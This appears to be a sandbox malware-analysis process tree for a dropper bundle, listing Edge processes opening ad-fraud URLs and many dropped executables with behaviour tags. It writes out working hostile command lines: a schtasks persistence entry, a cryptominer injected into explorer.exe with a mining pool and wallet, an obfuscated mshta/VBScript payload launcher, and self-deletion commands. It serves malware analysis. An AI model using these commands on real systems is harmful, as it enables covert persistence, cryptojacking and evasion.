C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,4979366431149005744,5418940169112441998,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6416 /prefetch:15⤵PID:16924
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,4979366431149005744,5418940169112441998,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3648 /prefetch:15⤵PID:12368
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,4979366431149005744,5418940169112441998,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6660 /prefetch:15⤵PID:2068
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,4979366431149005744,5418940169112441998,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6692 /prefetch:15⤵PID:5436
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2060,4979366431149005744,5418940169112441998,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3620 /prefetch:85⤵PID:3108
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,4979366431149005744,5418940169112441998,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6732 /prefetch:15⤵PID:1884
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,4979366431149005744,5418940169112441998,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5364 /prefetch:15⤵PID:2848
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,4979366431149005744,5418940169112441998,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3644 /prefetch:15⤵PID:4512
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,4979366431149005744,5418940169112441998,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5756 /prefetch:15⤵PID:6032
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,4979366431149005744,5418940169112441998,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5612 /prefetch:15⤵PID:7760
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2060,4979366431149005744,5418940169112441998,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5748 /prefetch:85⤵PID:8000
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,4979366431149005744,5418940169112441998,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6084 /prefetch:15⤵PID:8648
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,4979366431149005744,5418940169112441998,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6732 /prefetch:15⤵PID:8672
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2060,4979366431149005744,5418940169112441998,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6496 /prefetch:85⤵PID:9032
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2060,4979366431149005744,5418940169112441998,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3592 /prefetch:85⤵PID:9016
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,4979366431149005744,5418940169112441998,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6468 /prefetch:15⤵PID:9252
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,4979366431149005744,5418940169112441998,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1656 /prefetch:15⤵PID:9808
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,4979366431149005744,5418940169112441998,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6416 /prefetch:15⤵PID:9632
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,4979366431149005744,5418940169112441998,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5348 /prefetch:15⤵PID:9724
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad4⤵PID:14540
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd3a1446f8,0x7ffd3a144708,0x7ffd3a1447185⤵PID:14592
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=18514834⤵PID:16192
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd3a1446f8,0x7ffd3a144708,0x7ffd3a1447185⤵PID:16020
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=18515134⤵PID:12304
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd3a1446f8,0x7ffd3a144708,0x7ffd3a1447185⤵PID:13352
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=20872154⤵PID:7228
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd3a1446f8,0x7ffd3a144708,0x7ffd3a1447185⤵PID:2284
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=42631194⤵PID:8300
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd3a1446f8,0x7ffd3a144708,0x7ffd3a1447185⤵PID:1864
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=12942314⤵PID:9692
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd3a1446f8,0x7ffd3a144708,0x7ffd3a1447185⤵PID:9460
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS49F846A0\Thu2090b5515d63b2.exeThu2090b5515d63b2.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5188 -
C:\Users\Admin\AppData\Local\Temp\tmpB8D0_tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmpB8D0_tmp.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5400 -
C:\Users\Admin\AppData\Local\Temp\tmpB8D0_tmp.exeC:\Users\Admin\AppData\Local\Temp\tmpB8D0_tmp.exe3⤵
- Executes dropped EXE
PID:5804
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS49F846A0\Thu2025d6674aed72ba.exeThu2025d6674aed72ba.exe /mixone1⤵
- Executes dropped EXE
PID:5324 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5324 -s 2642⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:3016
-
-
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"1⤵
- Executes dropped EXE
PID:5608 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit2⤵PID:4640
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'3⤵
- Creates scheduled task(s)
PID:4788
-
-
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5604 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit3⤵PID:3492
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'4⤵
- Creates scheduled task(s)
PID:1108
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"3⤵PID:2064
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth3⤵PID:6556
-
-
-
C:\Windows\System32\sihclient.exeC:\Windows\System32\sihclient.exe /cv qZIHR0hrq02NvNbKVX1Y/g.0.21⤵PID:5504
-
C:\Users\Admin\AppData\Local\Temp\7zS49F846A0\Thu20a5f7ccaa78.exeC:\Users\Admin\AppData\Local\Temp\7zS49F846A0\Thu20a5f7ccaa78.exe1⤵PID:5780
-
C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5712
-
C:\Users\Admin\AppData\Local\Temp\7zS49F846A0\Thu20fdd9ac35a68.exeThu20fdd9ac35a68.exe1⤵
- Executes dropped EXE
PID:5284
-
C:\Users\Admin\AppData\Local\Temp\7zS49F846A0\Thu2094524d5e5b.exeThu2094524d5e5b.exe1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:5176 -
C:\Users\Admin\Documents\YgRjT0wrJ39RnM3FbMDp2HMZ.exe"C:\Users\Admin\Documents\YgRjT0wrJ39RnM3FbMDp2HMZ.exe"2⤵
- Executes dropped EXE
PID:5916
-
-
C:\Users\Admin\Documents\77ejhgU14uaTpzc0W3IiZk13.exe"C:\Users\Admin\Documents\77ejhgU14uaTpzc0W3IiZk13.exe"2⤵
- Executes dropped EXE
PID:3444 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3444 -s 2843⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:2348
-
-
-
C:\Users\Admin\Documents\dx3mskZpc_3BwBlnPkPHfehD.exe"C:\Users\Admin\Documents\dx3mskZpc_3BwBlnPkPHfehD.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4688 -
C:\Users\Admin\Documents\dx3mskZpc_3BwBlnPkPHfehD.exe"C:\Users\Admin\Documents\dx3mskZpc_3BwBlnPkPHfehD.exe"3⤵
- Checks processor information in registry
PID:7044 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im dx3mskZpc_3BwBlnPkPHfehD.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\dx3mskZpc_3BwBlnPkPHfehD.exe" & del C:\ProgramData\*.dll & exit4⤵PID:4104
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im dx3mskZpc_3BwBlnPkPHfehD.exe /f5⤵
- Kills process with taskkill
PID:6384
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 65⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Delays execution with timeout.exe
PID:3820
-
-
-
-
-
C:\Users\Admin\Documents\JFudh7nWrTWwqiP5qkvL8kr5.exe"C:\Users\Admin\Documents\JFudh7nWrTWwqiP5qkvL8kr5.exe"2⤵
- Executes dropped EXE
PID:4536 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4536 -s 2403⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:2260
-
-
-
C:\Users\Admin\Documents\9azffqp_kdFb7opxKi6I2hNW.exe"C:\Users\Admin\Documents\9azffqp_kdFb7opxKi6I2hNW.exe"2⤵
- Executes dropped EXE
PID:6108 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6108 -s 2843⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:1404
-
-
-
C:\Users\Admin\Documents\GmxWVebXDB1f6JtLqxL9_lDa.exe"C:\Users\Admin\Documents\GmxWVebXDB1f6JtLqxL9_lDa.exe"2⤵
- Executes dropped EXE
PID:4528
-
-
C:\Users\Admin\Documents\o3SIWcaWOjA7yc_XBFpR5dBN.exe"C:\Users\Admin\Documents\o3SIWcaWOjA7yc_XBFpR5dBN.exe"2⤵
- Executes dropped EXE
PID:5096 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5096 -s 2403⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5624
-
-
-
C:\Users\Admin\Documents\ByJHbNLLgaV4YPP2_A2wBDXo.exe"C:\Users\Admin\Documents\ByJHbNLLgaV4YPP2_A2wBDXo.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5168
-
-
C:\Users\Admin\Documents\54gpMhSqjystBq2v3_xHQE4O.exe"C:\Users\Admin\Documents\54gpMhSqjystBq2v3_xHQE4O.exe"2⤵PID:1608
-
C:\Users\Admin\Documents\54gpMhSqjystBq2v3_xHQE4O.exe"C:\Users\Admin\Documents\54gpMhSqjystBq2v3_xHQE4O.exe"3⤵PID:5140
-
-
C:\Users\Admin\Documents\54gpMhSqjystBq2v3_xHQE4O.exe"C:\Users\Admin\Documents\54gpMhSqjystBq2v3_xHQE4O.exe"3⤵
- Executes dropped EXE
PID:5180
-
-
C:\Users\Admin\Documents\54gpMhSqjystBq2v3_xHQE4O.exe"C:\Users\Admin\Documents\54gpMhSqjystBq2v3_xHQE4O.exe"3⤵PID:6068
-
-
C:\Users\Admin\Documents\54gpMhSqjystBq2v3_xHQE4O.exe"C:\Users\Admin\Documents\54gpMhSqjystBq2v3_xHQE4O.exe"3⤵PID:3168
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1608 -s 20883⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6392
-
-
-
C:\Users\Admin\Documents\q7pomhNgQVbB28vWXQ6hB2jT.exe"C:\Users\Admin\Documents\q7pomhNgQVbB28vWXQ6hB2jT.exe"2⤵
- Executes dropped EXE
PID:1304
-
-
C:\Users\Admin\Documents\pmP0ZvUaEFBUiW50PXvc5Oza.exe"C:\Users\Admin\Documents\pmP0ZvUaEFBUiW50PXvc5Oza.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4716 -
C:\Users\Admin\Documents\pmP0ZvUaEFBUiW50PXvc5Oza.exeC:\Users\Admin\Documents\pmP0ZvUaEFBUiW50PXvc5Oza.exe3⤵
- Executes dropped EXE
PID:1988
-
-
-
C:\Users\Admin\Documents\KgjZ0r60omuSU4YvtwKZ1heM.exe"C:\Users\Admin\Documents\KgjZ0r60omuSU4YvtwKZ1heM.exe"2⤵
- Executes dropped EXE
PID:5584 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:CLOse( crEateOBjeCt ( "wScrIPT.SHELL" ). RuN( "C:\Windows\system32\cmd.exe /c TYpE ""C:\Users\Admin\Documents\KgjZ0r60omuSU4YvtwKZ1heM.exe"" >CndH5V.EXe && Start Cndh5V.EXE -pHMKPyuuVVnjhxYIEreJKQmnfTDzj & IF """"== """" for %w In ( ""C:\Users\Admin\Documents\KgjZ0r60omuSU4YvtwKZ1heM.exe"" ) do taskkill /F -iM ""%~nxw"" " , 0, tRUE ) )3⤵PID:3396
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c TYpE "C:\Users\Admin\Documents\KgjZ0r60omuSU4YvtwKZ1heM.exe" >CndH5V.EXe && Start Cndh5V.EXE -pHMKPyuuVVnjhxYIEreJKQmnfTDzj&IF ""== "" for %w In ("C:\Users\Admin\Documents\KgjZ0r60omuSU4YvtwKZ1heM.exe" ) do taskkill /F -iM "%~nxw"4⤵PID:1812
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F -iM "KgjZ0r60omuSU4YvtwKZ1heM.exe"5⤵
- Kills process with taskkill
PID:3040
-
-
C:\Users\Admin\AppData\Local\Temp\CndH5V.EXeCndh5V.EXE -pHMKPyuuVVnjhxYIEreJKQmnfTDzj5⤵
- Executes dropped EXE
PID:5228 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:CLOse( crEateOBjeCt ( "wScrIPT.SHELL" ). RuN( "C:\Windows\system32\cmd.exe /c TYpE ""C:\Users\Admin\AppData\Local\Temp\CndH5V.EXe"" >CndH5V.EXe && Start Cndh5V.EXE -pHMKPyuuVVnjhxYIEreJKQmnfTDzj & IF ""-pHMKPyuuVVnjhxYIEreJKQmnfTDzj""== """" for %w In ( ""C:\Users\Admin\AppData\Local\Temp\CndH5V.EXe"" ) do taskkill /F -iM ""%~nxw"" " , 0, tRUE ) )6⤵PID:2280
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c TYpE "C:\Users\Admin\AppData\Local\Temp\CndH5V.EXe" >CndH5V.EXe && Start Cndh5V.EXE -pHMKPyuuVVnjhxYIEreJKQmnfTDzj&IF "-pHMKPyuuVVnjhxYIEreJKQmnfTDzj"== "" for %w In ("C:\Users\Admin\AppData\Local\Temp\CndH5V.EXe" ) do taskkill /F -iM "%~nxw"7⤵PID:5944
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" bFut_Y.g_U,GpozpZJ6⤵
- Loads dropped DLL
PID:7164
-
-
-
-
-
-
C:\Users\Admin\Documents\MKkaEokfG5R_kn2oaNMJZOa0.exe"C:\Users\Admin\Documents\MKkaEokfG5R_kn2oaNMJZOa0.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5600 -
C:\Users\Admin\Documents\MKkaEokfG5R_kn2oaNMJZOa0.exe"C:\Users\Admin\Documents\MKkaEokfG5R_kn2oaNMJZOa0.exe"3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:5760
-
-
-
C:\Users\Admin\Documents\Ps6Gu6eeDzR0Kasyet5T9Z0V.exe"C:\Users\Admin\Documents\Ps6Gu6eeDzR0Kasyet5T9Z0V.exe"2⤵
- Executes dropped EXE
PID:6032 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6032 -s 8643⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6020
-
-
-
C:\Users\Admin\Documents\VNLG_Lyl_PAkwslNQQBcBUGb.exe"C:\Users\Admin\Documents\VNLG_Lyl_PAkwslNQQBcBUGb.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5812
-
-
C:\Users\Admin\Documents\2fRUngdME9bOU9FVYsq4kr39.exe"C:\Users\Admin\Documents\2fRUngdME9bOU9FVYsq4kr39.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5004
-
-
C:\Users\Admin\Documents\0FXNrQOXnB4Wc5NQnjTdXBc2.exe"C:\Users\Admin\Documents\0FXNrQOXnB4Wc5NQnjTdXBc2.exe"2⤵
- Executes dropped EXE
PID:3808 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3808 -s 3043⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:4200
-
-
-
C:\Users\Admin\Documents\LYU90oLNsyUCRkuaxIjskqT4.exe"C:\Users\Admin\Documents\LYU90oLNsyUCRkuaxIjskqT4.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1860
-
-
C:\Users\Admin\Documents\_bdynvuYeQRGy2w0QvZsnPsB.exe"C:\Users\Admin\Documents\_bdynvuYeQRGy2w0QvZsnPsB.exe"2⤵PID:4104
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4104 -s 2803⤵
- Program crash
PID:2532
-
-
-
C:\Users\Admin\Documents\CNkJ9U9GClV52Di3oXGkg9ch.exe"C:\Users\Admin\Documents\CNkJ9U9GClV52Di3oXGkg9ch.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3940
-
-
